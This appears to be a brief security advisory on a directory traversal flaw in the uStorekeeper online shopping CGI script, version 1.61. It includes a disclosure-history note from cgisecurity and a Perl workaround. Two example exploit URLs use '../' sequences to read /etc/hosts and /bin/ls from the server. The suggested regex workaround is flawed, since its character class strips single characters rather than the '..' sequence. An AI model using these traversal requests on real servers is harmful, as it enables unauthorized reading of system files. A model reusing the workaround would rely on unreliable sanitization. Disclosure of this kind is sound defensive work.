|
Vulnerability uStorekeeper Affected uStorekeeper(tm) Online Shopping System - ustorekeeper.pl version 1.61 (probably others, but not tested) Description UkR hacking team found following. '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retreive files from remote sever, which should not be accessible normally (for ex., /etc/passwd). Exploit: http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls | zenomorph from 'cgisecurity' added following. The following advisory was actually found in december of 2000 by the staff at cgisecurity.com. No bugtraq posted was published on the otherhand because after speaking with the vendor they informed them that not every version was effected and that the newer versions of this product have been patched. A staff member of cgisecurity.com did make a proof of exploit for this code but they did give little details of the vendor due to them asking them not to. Solution Workaround: # this will help in somewhat... $input =~ s/[(\.\.)|\/]//g;